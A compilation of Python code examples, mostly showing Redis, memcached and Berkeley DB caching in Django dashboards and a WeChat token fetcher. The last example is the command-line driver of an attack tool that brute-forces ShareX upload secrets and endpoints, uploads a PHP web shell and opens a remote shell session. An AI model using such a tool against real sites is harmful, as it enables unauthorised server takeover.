Example #1
class Token:
    TOKEN_KEY = "wechat_token_key"
    URL_TEMPLATE = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}"
    RESPONSE_KEY = "access_token"
    EXPIRE_KEY = "expires_in"

    cache = None

    def __init__(self):
        self.cache = Cache()

    def fetch(self):
        access_token = self.cache.get(self.TOKEN_KEY)
        if access_token is None or len(access_token) == 0:
            print("Token has been expired, try fetching new one.")
            # refresh token
            response = HttpUtils.get(url=self.URL_TEMPLATE.format(
                Config.get("app_id"), Config.get("app_secret")),
                                     return_raw=True)
            if response is not None:
                resp_json = json.loads(str(response.text))
                access_token = resp_json[self.RESPONSE_KEY]
                expire_time = resp_json[self.EXPIRE_KEY]
                print("Fetch done, " + access_token)
                self.cache.set_with_expire(self.TOKEN_KEY, access_token,
                                           expire_time)

        return access_token
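The Token class above is a cache-aside lookup: read the token from the cache, and only call the WeChat token endpoint when the cached value is missing or empty, then store the fresh token with the expiry the API reports. Below is a minimal, self-contained sketch of that pattern; InMemoryCache and fetch_remote_token are hypothetical stand-ins for the project-specific Cache, HttpUtils and Config helpers.

import time

class InMemoryCache:
    # Hypothetical stand-in for the Redis-backed Cache used above.
    def __init__(self):
        self._store = {}

    def get(self, key):
        value, expires_at = self._store.get(key, (None, 0))
        return value if time.time() < expires_at else None

    def set_with_expire(self, key, value, ttl_seconds):
        self._store[key] = (value, time.time() + ttl_seconds)

def fetch_remote_token():
    # Placeholder for the real HTTP call to the token endpoint.
    return {"access_token": "dummy-token", "expires_in": 7200}

def get_access_token(cache, key="wechat_token_key"):
    token = cache.get(key)
    if not token:  # missing or expired, so refresh
        payload = fetch_remote_token()
        token = payload["access_token"]
        cache.set_with_expire(key, token, payload["expires_in"])
    return token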
Example #2
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Example #3
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Example #4
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets = Dataset.objects.filter(user__in=users).count()
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     return total_datasets
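The three methods above (and the logging variants further down) repeat the same count-then-cache pattern: try Redis first, fall back to a Django .count() query, and store a non-zero result for settings.REDIS_STATS_TTL seconds. Below is a hedged sketch of a generic helper capturing that pattern; cached_count is a hypothetical name, and the cache is assumed to expose the same get/set interface as Cache above.

def cached_count(cache, key, ttl, compute):
    # Return a cached count, computing and caching it on a miss.
    value = cache.get(key)
    if value:
        return int(value)  # coerce, in case the backend returns strings
    value = compute()  # e.g. a Django queryset .count()
    if value > 0:  # only cache non-zero results, as in the examples above
        cache.set(key, value, ttl)
    return value

# Hypothetical usage, mirroring get_total_datastreams():
#   cached_count(Cache(db=0), 'my_total_datastreams_%s' % self.id,
#                settings.REDIS_STATS_TTL,
#                lambda: DataStream.objects.filter(user=self.id).count())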
Example #5
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets, settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets, settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id), published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams, settings.REDIS_STATS_TTL)

    published_dashboards = c.get('published_dashboards_' + str(account_id))
    if not published_dashboards:
        cursor.execute("SELECT COUNT(1) as val FROM ao_dashboards d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dashboard_revisions b WHERE b.dashboard_id = d.id AND NOT EXISTS(SELECT * FROM ao_dashboard_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dashboard_id = c.dashboard_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_dashboards = row[0]
        c.set('published_dashboards_' + str(account_id), published_dashboards, settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' + str(account_id))
    if not published_visualizations:
        cursor.execute("SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id), published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations, settings.REDIS_STATS_TTL)

    return locals()
Example #6
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets = Dataset.objects.filter(user__in=users).count()
         #if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     #else:
     #    if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Example #7
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets = Dataset.objects.filter(user__in=users).count()
         if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     else:
         if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Example #8
def invoke(query, output=None):

    if not output:
        output = 'json'
        query['pOutput'] = output.upper()

    content_type = settings.CONTENT_TYPES.get(output)

    try:
        engine_domain = get_domain_with_protocol('engine')
        url = engine_domain + settings.END_POINT_SERVLET

        memcached = settings.MEMCACHED_ENGINE_END_POINT
        if memcached:
            engine_cache = memcache.Client(memcached, debug=0)
            if engine_cache:
                key = str(hash(frozenset(sorted(query.items()))))
                value = engine_cache.get(key)
                if value is None:
                    value, content_type = _request(query, url)
                    engine_cache.set(key, value, settings.MEMCACHED_DEFAULT_TTL)
                    return value, content_type
                else:
                    return value, content_type
            else:
                logger = logging.getLogger(__name__)
                logger.debug('No memcached client could be created. Dataview will be retrieved from engine.')

        return _request(query, url)

    except Exception, e:
        """ TOO much logging from here
        logger = logging.getLogger(__name__)
        logger.debug('{0}. Dataview will be retrieved from redis '.format(str(e)))
        """

        if output == 'json':
            if 'pFilter0' not in query:

                dataviews_cache = Cache(db=settings.CACHE_DATABASES['dataviews'])
                key = str(query.get('pId'))
                params = [ query[arg].decode('utf-8') for arg in sorted(query.keys()) if arg.startswith('pArgument')]
                if params:
                    key += u'::' + u':'.join(params)

                return dataviews_cache.get(key), content_type

        return None, content_type
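In the memcached branch above the key is derived from hash(frozenset(sorted(query.items()))). That is deterministic within one process, but with hash randomization (opt-in on Python 2.7, the default on modern Python 3) the same query can hash differently in different worker processes, which weakens a shared cache. A sketch of a stable alternative built from a digest of the sorted items; make_query_key is a hypothetical helper, not part of the original module.

import hashlib

def make_query_key(query, prefix='engine'):
    # Hypothetical helper: build a deterministic cache key from a dict of
    # query parameters by hashing the sorted "key=value" pairs.
    parts = ['%s=%s' % (k, query[k]) for k in sorted(query)]
    digest = hashlib.md5('&'.join(parts).encode('utf-8')).hexdigest()
    return '%s:%s' % (prefix, digest)

# e.g. make_query_key({'pId': '42', 'pOutput': 'JSON'})
#      -> 'engine:' followed by a 32-character hex digest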
Example #9
class VisualizationHitsDAO:
    """class for manage access to Hits in DB and index"""

    doc_type = "vz"
    from_cache = False

    # cache TTL, 1 hour
    TTL = 3600

    def __init__(self, visualization):
        self.visualization = visualization
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """agrega un hit al datastream. """

        try:
            hit = VisualizationHits.objects.create(
                visualization_id=self.visualization.visualization_id, channel_type=channel_type
            )
        except IntegrityError:
            # is this the right exception to raise?
            raise VisualizationNotFoundException()

        self.logger.info("VisualizationHitsDAO hit! (guid: %s)" % (self.datastream.guid))

        # build the document used to update the index.
        doc = {
            "docid": "%s::%s" % (self.doc_type.upper(), self.visualization.guid),
            "type": self.doc_type,
            "script": "ctx._source.fields.hits+=1",
        }

        return self.search_index.update(doc)

    def count(self):
        return VisualizationHits.objects.filter(visualization_id=self.visualization.visualization_id).count()

    def _get_cache(self, cache_key):

        cache = self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_day(self, day):
        """retorna los hits de un día determinado"""

        # if a datetime was passed, keep only its date part
        if type(day) == type(datetime.today()):
            day = day.date()

        cache_key = "%s_hits_%s_by_date_%s" % (self.doc_type, self.visualization.guid, str(day))

        hits = self._get_cache(cache_key)

        # if this particular day is not cached yet, store it; when the requested
        # day is today, refresh the cache but always use the value from the DB
        if not hits or day == date.today():
            hits = VisualizationHits.objects.filter(
                visualization=self.visualization, created_at__startswith=day
            ).count()

            self._set_cache(cache_key, hits)

        return (day, hits)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # not sure this guard is necessary
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.visualization.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # not in the cache, so compute and store it
        if not hits:
            # start date of the window
            start_date = datetime.today() - timedelta(days=day)

            # truncate created_at to its date part
            truncate_date = connection.ops.date_trunc_sql("day", "created_at")

            qs = VisualizationHits.objects.filter(visualization=self.visualization, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = (
                qs.extra(select={"_date": truncate_date, "fecha": "DATE(created_at)"})
                .values("fecha")
                .order_by("created_at")
                .annotate(hits=Count("created_at"))
            )

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())

            for i in hits:
                try:
                    control.remove(i["fecha"])
                except ValueError:
                    pass

            hits = list(hits)

            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k["fecha"])

            # convert the dates to ISO format
            hits = map(self._date_isoformat, hits)

            # store the result in the cache
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row["fecha"] = row["fecha"].isoformat()
        return row
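count_by_days above fills days with no traffic by building a list of control dates and appending {"fecha": d, "hits": 0} for every date the queryset did not return. The same step in isolation, as a small standalone sketch (pure Python, no Django; fill_missing_days is a hypothetical name):

from datetime import date, timedelta

def fill_missing_days(rows, days):
    # Hypothetical helper. rows look like [{'fecha': date, 'hits': n}]; add a
    # zero-hit entry for any day in the last `days` days that has no row,
    # then sort oldest first.
    window = [date.today() - timedelta(days=x) for x in range(days - 1, -1, -1)]
    seen = set(row['fecha'] for row in rows)
    filled = list(rows) + [{'fecha': d, 'hits': 0} for d in window if d not in seen]
    return sorted(filled, key=lambda row: row['fecha'])

# e.g. fill_missing_days([{'fecha': date.today(), 'hits': 3}], 7)
#      returns seven entries, six of them with hits == 0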
Example #10
class DatastreamHitsDAO():
    """Manages access to datastream hits in the DB and the search index."""

    doc_type = "ds"
    from_cache = False

    # cache TTL, 1 hour
    TTL = 3600

    def __init__(self, datastream):
        self.datastream = datastream
        #self.datastream_revision = datastream.last_published_revision
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """Adds a hit to the datastream."""

        # TODO: temporary fix for the move from DT to DAO.
        # The problem is that the datastream sometimes comes from a queryset and
        # sometimes from a DAO, and they are different kinds of objects.
        try:
            datastream_id = self.datastream.datastream_id
        except:
            datastream_id = self.datastream['datastream_id']

        try:
            guid = self.datastream.guid
        except:
            guid = self.datastream['guid']

        try:
            hit = DataStreamHits.objects.create(datastream_id=datastream_id, channel_type=channel_type)
        except IntegrityError:
            # is this the right exception to raise?
            raise DataStreamNotFoundException()

        self.logger.info("DatastreamHitsDAO hit! (guid: %s)" % guid)

        # build the document used to update the index.
        doc = {'docid': "DS::%s" % guid,
               "type": "ds",
               "script": "ctx._source.fields.hits+=1"}

        return self.search_index.update(doc)

    def count(self):
        return DataStreamHits.objects.filter(datastream_id=self.datastream['datastream_id']).count()

    def _get_cache(self, cache_key):

        cache = self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_days(self, day=30, channel_type=None):
        """Returns the total hits for the last `day` days and the per-day hits from `day` days ago up to today."""

        # not sure this guard is necessary
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.datastream.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # not in the cache, so compute and store it
        if not hits:
            # start date of the window
            start_date = datetime.today() - timedelta(days=day)

            # truncate created_at to its date part
            truncate_date = connection.ops.date_trunc_sql('day', 'created_at')

            qs = DataStreamHits.objects.filter(datastream=self.datastream, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = qs.extra(select={'_date': truncate_date, "fecha": 'DATE(created_at)'}).values("fecha").order_by("created_at").annotate(hits=Count("created_at"))

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())

            for i in hits:
                try:
                    control.remove(i['fecha'])
                except ValueError:
                    pass

            hits = list(hits)

            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k['fecha'])

            # convert the dates to ISO format
            hits = map(self._date_isoformat, hits)

            # store the result in the cache
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row['fecha'] = row['fecha'].isoformat()
        return row
Example #11
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets,
              settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(
            user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets,
              settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id),
              published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(
            user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams,
              settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' +
                                     str(account_id))
    if not published_visualizations:
        cursor.execute(
            "SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)",
            [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id),
              published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(
            user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations,
              settings.REDIS_STATS_TTL)

    return locals()
Example #12
class Model:
    def __init__(self, clsobj=XParcel):
        self.__db = DB()
        self.__cache = Cache()
        self.__clsobj = clsobj
        self.maxCount = 4096

    def open(self, filepath, mode='w'):
        self.mode = mode
        intMode = {'r':DB_RDONLY, 'w':DB_CREATE|DB_TRUNCATE, 'a':DB_CREATE}[mode]
        self.__db.setcache(256*1024*1024, 0)
        return self.__db.open(filepath, intMode)

    def close(self):
        self.sync()
        self.__db.close()

    def put(self, key, data):    
        self.__cache.put(key, data)
        self.__measure()

    def get(self, key):
        value = self.__cache.get(key)
        if not value:
            value = self.db_get(key)
            if value:
                self.__cache.put(key, value)
                self.__measure()
        return value

    def keys(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST|XDB_NOT_RETRIEVE_VAL)
        while result:
            if not result[0].startswith('__'):
                yield result[0]
            result = cursor.get(None, DB_NEXT|XDB_NOT_RETRIEVE_VAL)
        cursor.close()

    def values(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def sync(self):
        for key, value in self.__cache.items():
            self.db_put(key, value)

    def items(self):
        self.__cache.cache_sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield result[0], obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def __measure(self):
        while len(self.__cache) > self.maxCount:
            #print len(self.__cache), self.__cache.__dict__
            key, value = self.__cache.top()
            self.db_put(key, value)
            self.__cache.pop()

    def db_get(self, key):
        result = self.__db.get(key, 0)
        if result:
            obj = self.__clsobj()
            obj.unpack(result[1])
            return obj
        return None

    def db_put(self, key, data):
        if self.mode != 'r':
            return self.__db.put(key, data.pack(), 0)
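The Model class above uses its cache as a bounded write-back buffer: put writes only to the cache, __measure flushes the oldest entries to the DB once maxCount is exceeded, and get falls back to the DB and repopulates the cache. Below is a compact sketch of that pattern built on an OrderedDict, assuming a backing store object with put/get; WriteBackCache is a hypothetical name, not the Cache class used in these examples.

from collections import OrderedDict

class WriteBackCache:
    # Hypothetical sketch of the pattern above: keep at most max_count entries
    # in memory and flush the oldest ones to a backing store.
    def __init__(self, store, max_count=4096):
        self.store = store          # anything exposing put(key, value) / get(key)
        self.max_count = max_count
        self._items = OrderedDict()

    def put(self, key, value):
        self._items[key] = value
        self._items.move_to_end(key)
        # Flush the oldest entries to the backing store once the bound is hit.
        while len(self._items) > self.max_count:
            old_key, old_value = self._items.popitem(last=False)
            self.store.put(old_key, old_value)

    def get(self, key):
        if key in self._items:
            return self._items[key]
        value = self.store.get(key)  # cache miss: fall back to the store
        if value is not None:
            self.put(key, value)     # and repopulate the cache
        return value

    def sync(self):
        # Write everything still buffered in memory to the backing store.
        for key, value in self._items.items():
            self.store.put(key, value)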
Example #13
def main():
    if os.name == 'nt':
        import colorama
        colorama.init(convert=True)

    Banner.print()

    Logger.warning('use with caution. you are responsible for your actions')
    Logger.warning(
        'the developer assumes no liability and is not responsible for any misuse or damage'
    )

    Logger.empty_line()

    parser = argparse.ArgumentParser(usage='%(prog)s [options]')
    parser.error = Logger.error

    parser.add_argument('-v',
                        '--verbose',
                        help='verbose',
                        dest='verbose',
                        action='store_true')
    parser.add_argument('-s',
                        '--secret',
                        help='sharex secret key',
                        dest='secret',
                        metavar='')
    parser.add_argument('--form-name',
                        help='multipart file form name',
                        dest='form_name',
                        metavar='',
                        default='sharex')
    parser.add_argument('--field-name',
                        help='sharex secret key post data field name',
                        dest='field_name',
                        metavar='',
                        default='secret')
    parser.add_argument('--no-cache',
                        help='disable cache',
                        dest='cache_enabled',
                        action='store_false')

    mandatory_group = parser.add_argument_group('mandatory arguments')
    mandatory_group.add_argument('-u',
                                 '--url',
                                 help='target url',
                                 dest='url',
                                 metavar='',
                                 required=True)

    brute_group = parser.add_argument_group('brute force arguments')
    brute_group.add_argument('--brute-endpoint',
                             help='brute force file upload endpoint',
                             dest='brute_endpoint',
                             action='store_true')
    brute_group.add_argument('--brute-secret',
                             help='brute force sharex secret key',
                             dest='brute_secret',
                             action='store_true')
    brute_group.add_argument(
        '--brute-field',
        help='brute force sharex secret key post data field name',
        dest='brute_field',
        action='store_true')
    brute_group.add_argument('--brute-form',
                             help='brute force multipart file form name',
                             dest='brute_form',
                             action='store_true')

    if len(sys.argv) == 1:
        parser.print_help()
        return

    args = parser.parse_args()

    if not Validate.url(args.url):
        Logger.error(f'invalid url: {args.url}')

    if not Validate.active_url(args.url):
        Logger.error('target is offline')

    Logger.success('target is online')

    cached_shell_url = Cache.get(args.url) if args.cache_enabled else None

    if cached_shell_url is not None:
        Logger.info('shell url fetched from cache')
        shell_url = cached_shell_url['shell_url']
    else:
        url = args.url
        field_name = args.field_name
        secret = args.secret
        form_name = args.form_name

        if args.brute_endpoint:
            if args.verbose:
                Logger.info('brute forcing endpoint...')

            url = Brute.endpoint(url)

            if url is None:
                Logger.error('endpoint not found')

            Logger.success(f'endpoint found: \x1b[95m{url}')

        if Brute.is_required(
                url
        ):  # checks if it's necessary to brute force secret key POST data field name and secret key
            if args.brute_field:
                if args.verbose:
                    Logger.info('brute forcing secret key field name...')

                field_name = Brute.field_name(url)

                if field_name is None:
                    Logger.error('field name not found')

                Logger.success(f'field name found: \x1b[95m{field_name}')

            if args.brute_secret:
                if args.verbose:
                    Logger.info('brute forcing secret key...')

                secret = Brute.secret(url, field_name)

                if secret is None:
                    Logger.error('secret not found')

                Logger.success(f'secret found: \x1b[95m{secret}')

        if args.brute_form:
            if args.verbose:
                Logger.info('brute forcing multipart form name...')

            form_name = Brute.form_name(url, secret, field_name)

            if form_name is None:
                Logger.error('form name not found')

            Logger.success(f'form name found: \x1b[95m{form_name}')

        if args.verbose:
            Logger.info('attempting to upload php web shell...')

        try:
            shell_url = Exploit.upload_shell(
                url, form_name, secret, field_name, args.verbose,
                args.cache_enabled
            )  # program will exit if an error occurs (shell_url cannot be None)
        except Exception:
            Logger.error(
                'an error occurred while attempting to upload the PHP web shell to the target site'
            )

    Shell.command_line(shell_url)